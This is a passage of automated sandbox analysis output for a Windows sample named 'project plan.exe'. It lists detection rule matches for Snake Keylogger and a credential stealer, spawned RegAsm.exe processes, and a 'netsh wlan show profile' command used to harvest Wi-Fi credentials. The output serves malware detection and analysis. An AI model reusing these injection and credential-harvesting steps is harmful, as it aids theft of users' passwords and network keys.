                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061472E83_2_061472E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614DAE83_2_0614DAE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061443203_2_06144320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061477403_2_06147740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061447783_2_06144778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06147B983_2_06147B98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06144BD03_2_06144BD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061407C83_2_061407C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06147FF03_2_06147FF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061450283_2_06145028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614F0283_2_0614F028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614E8503_2_0614E850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061484483_2_06148448
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061454803_2_06145480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614F4803_2_0614F480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061488A03_2_061488A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061458D83_2_061458D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614F8D83_2_0614F8D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06148CF83_2_06148CF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06145D303_2_06145D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061491503_2_06149150
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614ED683_2_0614ED68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061461883_2_06146188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061495A83_2_061495A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061465E03_2_061465E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614CDE83_2_0614CDE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06146A293_2_06146A29
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614CA5F3_2_0614CA5F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614CA703_2_0614CA70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06143A603_2_06143A60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06146E803_2_06146E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06143EB93_2_06143EB9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061472D83_2_061472D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061443103_2_06144310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061477333_2_06147733
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061447683_2_06144768
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06147B883_2_06147B88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06144BC13_2_06144BC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06147FE33_2_06147FE3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614F0133_2_0614F013
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061450183_2_06145018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061400373_2_06140037
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061484383_2_06148438
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061400403_2_06140040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614E8403_2_0614E840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061454703_2_06145470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614F4703_2_0614F470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061488973_2_06148897
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614C0D93_2_0614C0D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061458C83_2_061458C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614F8C93_2_0614F8C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06148CE93_2_06148CE9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06145D2B3_2_06145D2B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061491403_2_06149140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614617B3_2_0614617B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0614C1803_2_0614C180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061465D43_2_061465D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061646083_2_06164608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061624503_2_06162450
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061604983_2_06160498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061665883_2_06166588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061600403_2_06160040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06164C583_2_06164C58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06162D003_2_06162D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06166BD83_2_06166BD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061628A83_2_061628A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061608F03_2_061608F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061617483_2_06161748
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061635B03_2_061635B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061672283_2_06167228
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061652A03_2_061652A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061693D23_2_061693D2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061631583_2_06163158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06165F383_2_06165F38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06163FB83_2_06163FB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06161FF83_2_06161FF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06161BA03_2_06161BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061678703_2_06167870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061658E83_2_061658E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061624403_2_06162440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061604883_2_06160488
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061665783_2_06166578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061645F83_2_061645F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061600063_2_06160006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06164C483_2_06164C48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06162CF13_2_06162CF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06166BC83_2_06166BC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061628983_2_06162898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061608E03_2_061608E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061617393_2_06161739
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061635A03_2_061635A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061672193_2_06167219
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061652903_2_06165290
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061631483_2_06163148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06165F293_2_06165F29
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06163FA93_2_06163FA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06161FE93_2_06161FE9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06161B8F3_2_06161B8F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0616785F3_2_0616785F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061658D83_2_061658D8
                Source: C:\Users\user\Desktop\project plan.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1536 -s 1028
                Source: project plan.exeStatic PE information: No import functions for PE file found
                Source: project plan.exe, 00000000.00000000.1960972899.0000016754A42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIrulogixihejo> vs project plan.exe
                Source: project plan.exe, 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs project plan.exe
                Source: project plan.exe, 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEcozezoviD vs project plan.exe
                Source: project plan.exe, 00000000.00000002.2171707647.000001676EE60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameEcozezoviD vs project plan.exe
                Source: project plan.exeBinary or memory string: OriginalFilenameIrulogixihejo> vs project plan.exe
                Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, --.csBase64 encoded string: 'm6Xg2C2DGO3mlPcQp6s/LfmmtF6ui+8+Ju7mZMwu4ysjUr0OlymEIhyOhsWptaJK'
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, --.csBase64 encoded string: 'm6Xg2C2DGO3mlPcQp6s/LfmmtF6ui+8+Ju7mZMwu4ysjUr0OlymEIhyOhsWptaJK'
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/5@2/2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:120:WilError_03
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1536
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1568:120:WilError_03
                Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\7da7a6c0-778d-46da-af75-79ac18eb5ec4Jump to behavior
                Source: project plan.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: project plan.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                Source: C:\Users\user\Desktop\project plan.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002E1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002DC2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3222412002.0000000003CFB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002E2A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002DB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\project plan.exeFile read: C:\Users\user\Desktop\project plan.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\project plan.exe "C:\Users\user\Desktop\project plan.exe"
                Source: C:\Users\user\Desktop\project plan.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\project plan.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                Source: C:\Users\user\Desktop\project plan.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                Source: C:\Users\user\Desktop\project plan.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1536 -s 1028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profile
                Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\project plan.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\project plan.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profileJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\project plan.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
